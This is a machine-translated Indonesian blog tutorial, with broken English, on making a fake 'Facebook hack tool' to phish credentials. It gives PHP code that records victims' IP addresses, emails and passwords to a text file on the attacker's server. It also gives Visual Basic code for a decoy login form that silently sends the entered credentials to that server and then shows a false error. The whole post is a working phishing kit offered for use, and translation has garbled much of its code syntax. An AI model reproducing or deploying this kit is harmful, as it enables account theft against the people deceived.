image01
Uzumaki Naruto

Sage Mode

Naruto VS Sasuke

Siapa yang Terkuat?

Uchiha Sasuke

Mangekyou Sharingan

About

Rabu, 25 Juni 2014

Cara Membuat Phising Hack Tools Facebook

0 komentar
there is a program we call it Hack Tools Facebook
proggram was actually just a hoax or when you type in your email and password will be sent to a file that is in indhostinger I created a password and email to receive Casualties
in the program there are 2 textbox and 1 piece of fruit a command button  

2 textbox that is a container for Email & Password will be sent to our servers and command buttonnya in use to code execution, after execution of code in a program will call a file. php that's been made ​​before in our server
php file that has been the act Noted in calling victim ip sender, noting the date of calling the php file, and record the Email & Password victim who has been in the input textbox in 2 pieces that exist in the program and save it in a text file.

understand not?? If you do not understand please ask in a comment: D 

wrote directly tutorials Phishing Hack Tools for Creating a Facebook / create keyloger his tools to hack facebook ..

How to Make a Facebook Phishing Hack Tools

ingredients that you need to provide are:
1. Visual Basic Version 6.0 Download  Here
2. webhosting php and txt files for a accommodate us later

steps - steps:

1. Prepare notepad and enter this code

<? php
$ datum = date ('DMY / h: i: s A');
$ email = $ _GET [e];
$ password = $ _GET [p];
$ ip = getenv ('REMOTE_ADDR');
$ fl = fopen ('Ihiy.txt', 'a');
fwrite ($ fl, "IP Address: $ ip \ nDate: $ datum \ nUsername: $ email \ nPassword: $ password \ n \ n");
fclose ($ fl) ;
$ ref = $ _SERVER ['HTTP_REFERER'];
header ("location: $ ref");
?>


store the code with the name  terserahkamunamanya . php (shelf way: select file types -> all files)

2. Now open Microsoft Visual Basic 6.0 of its
3. prepare and module form, the form is named  frmUtama  and module named modConnect
4. Enter this code in modconnect

Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)  
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (_ ByRef
lpSFlags As Long, ByVal dwReserved As Long) As Long
Const INTERNET_CONNECTION_MODEM = 1
Const INTERNET_CONNECTION_LAN = 2
Const INTERNET_CONNECTION_PROXY = 4
Const INTERNET_CONNECTION_MODEM_BUSY = 8
 
'function is useful to check the Internet connection on the computer we use the fire InternetGetConnectedState
CekInternet Function (Optional connectMode As Integer) As Boolean
Dim flags As Long
CekInternet = InternetGetConnectedState (flags, 0)
= connectMode flags
End Function


5. The input frmUtama 2 textbox, 1 command button and 1 label
named first textbox: txtUname
both textbox named: txtPass

command button named: cmdLogin
command button was given the caption: & Login

labels are named: LBLInfo

enter this code into the form:

 Private Sub Form_Load ()
lblInfo.Caption = "Checking Internet Connection"
If CekInternet = False Then
lblInfo.Caption = "Computer Not Connected To The Internet!"
Else
lblInfo.Caption = "Connected With Your Computer"
Me.Caption = "caption up what you want to name wrote "
End If
End Sub


6. well after that click 2x cmdLogin who has given caption Earlier login, and enter this code:

Dim user, pass As String
Dim IE As Object
user = LCase (txtUname.Text)
pass = txtPass.Text
 
If txtUname.Text = "" Then
MsgBox "The text box is still empty, please fill it properly!", vbExclamation, "Error"
Else
lblInfo.Caption = "Medium login ..."
Set IE = CreateObject ("InternetExplorer.Application")
 
IE.Visible = 0
IE. Navigate "http://www.domainkamu.com/namafile.php?e =" & _
  user & "& p =" & pass
 
IE.Busy Do While
Sleep 200 'sleepnya 200 Ajah: p
 
Loop
IE.Quit
Set IE = Nothing
 
lblInfo. Caption = "Username / Password Wrong!"
MsgBox "Username / Password Error!", vbExclamation, "Error"
End If


if already nah, select File -> Project makeup. exe
complete me, stay deployed wrote, this could create a DJ, facebook, events could twitterpun


question:
Q: how to do clay password?
A: You will Appear later webhosting file named  Ihiy.txt
Q: then what can I do?
A : if you use any webhosting in the downloaded file, it later emerged the username and password of Victims

Leave a Reply

My Blog List

Diberdayakan oleh Blogger.

Blog Archive

About Me

Followers

About Me

Weekly most viewed